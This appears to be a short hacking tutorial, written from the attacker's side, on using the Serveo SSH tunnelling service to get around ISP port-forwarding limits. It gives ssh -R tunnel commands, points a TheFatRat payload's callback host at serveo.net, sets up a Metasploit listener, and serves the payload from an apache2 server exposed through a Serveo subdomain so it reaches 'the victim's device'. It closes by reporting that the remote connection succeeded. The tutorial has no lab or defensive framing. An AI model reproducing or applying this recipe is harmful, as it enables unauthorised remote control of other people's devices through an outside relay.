We all know that we need to set up port forwarding if we want to allow access to our machine or receive connections outside the local network, the problem is some ISPs block port forwarding and some don’t even have a port forwarding feature. The best solution to this is using the Serveo service. Serveo is an SSH server just for remote port forwarding. When a user connects to Serveo, they get a public URL that can be shared so other users can connect to their localhost server.
Let’s run through an example setup..
Creating a Generic TCP Forwarding Tunnel
1. Open Terminal
2. Run this command to create a TCP forwarding tunnel
ssh -R 1500:localhost:1492 serveo.net
1500 -> This is the port of the serveo service
1492 -> This is the port the serveo service will forward to. (So your Listener should listen on 1492 port)
Creating a Payload
I will be using TheFatRat to generate my payload. So the Host and Port will be as following:
Set LHOST IP: serveo.net
Set LPORT: 1500
Creating Listener using Metasploit
The Host and Port will be as following:
Set LHOST IP: 0.0.0.0 Set LPORT: 1492
Delivering the Payload via Our Apache2 Server.
Now, since our ISP does not allow port forwarding, how are we supposed to access our apache2 server via the victims device? Well, Serveo to the rescue here too, we can use the exact same method we used above to forward port 80 to our apache2 server, so the following is basically the same as above with port 80.
1. Run apache2 service
service apache2 start
2. Run the following command to request port forwarding from the server. You may substitute “lordvordex” for whatever sub-domain you’d like to request from Serveo to use when accessing localhost from the victim’s device.
ssh -R lordvordex:80:localhost:80 serveo.net
3. You can now access your localhost from lordvordex.serveo.net from the victims device.
Finally, running our payload:
As you can see, a connection has successfully been made 🙂
Hope this helped you. See ya later.